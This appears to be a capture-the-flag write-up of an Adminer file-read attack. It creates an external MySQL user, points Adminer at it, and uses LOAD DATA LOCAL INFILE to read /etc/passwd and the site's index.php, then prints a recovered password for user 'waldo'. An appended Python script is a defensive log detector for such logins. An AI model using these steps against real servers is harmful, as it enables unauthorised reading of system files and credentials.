4 adminer-php

Enumerate adminer.php

adminer.php

Using the technique described at https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Create a user on MySQL:

  • CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';

  • GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';

  • FLUSH PRIVILEGES;

adminer.php login
adminer.php successful login
  • Create database pwn

  • Create table data with field out as varchar(256)

Trying to read /etc/passwd

load data local infile "/etc/passwd"
into table pwn.data
fields terminated by "\n";

Trying to read /var/www/html/index.php

load data local infile "/var/www/html/index.php"
into table pwn.data
fields terminated by "\n";

We see a different password.


Using waldo:&<h5b~yK3F#{PaPB&dA}{H>
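
A defender-side check for the steps above, as an added example that is not part of the original notes: it scans web access logs for Adminer requests whose `server` parameter names a database host outside an allowlist, which is how a login against an external MySQL server shows up. The combined log format, the `server` query parameter, the allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the only database hosts Adminer is legitimately used with here.
ALLOWED_DB_HOSTS = {"", "localhost", "127.0.0.1"}

# Common/combined access log: client - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /adminer.php?username=dbadmin&db=app HTTP/1.1" 200 5120
198.51.100.23 - - [01/Jan/2024:10:05:12 +0000] "GET /adminer.php?server=203.0.113.50&username=kashz&db=pwn HTTP/1.1" 200 6301
198.51.100.23 - - [01/Jan/2024:10:05:40 +0000] "GET /adminer.php?server=203.0.113.50%3A3306&username=kashz&db=pwn&sql= HTTP/1.1" 200 7022
198.51.100.9 - - [01/Jan/2024:10:06:00 +0000] "GET /index.php?server=203.0.113.50 HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2024:10:07:00 +0000] "GET /adminer.php?server=localhost&username=root HTTP/1.1" 200 4100
"""


def remote_server_logins(log_text, allowed=ALLOWED_DB_HOSTS):
    """Return (client, db_host, status) for Adminer requests to non-allowlisted DB hosts."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        url = urlsplit(m["target"])
        # Match adminer.php and versioned names such as adminer-x.y.z.php
        if not re.search(r"adminer[^/]*\.php$", url.path, re.I):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for host in query.get("server", []):
            name = host.lower()
            if name.count(":") == 1:  # strip host:port, leave IPv6 literals alone
                name = name.rsplit(":", 1)[0]
            if name not in allowed:
                findings.append((m["client"], host, int(m["status"])))
    return findings


if __name__ == "__main__":
    for client, db_host, status in remote_server_logins(SAMPLE_LOG):
        print(f"{client} used Adminer against external DB host {db_host} (HTTP {status})")
```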
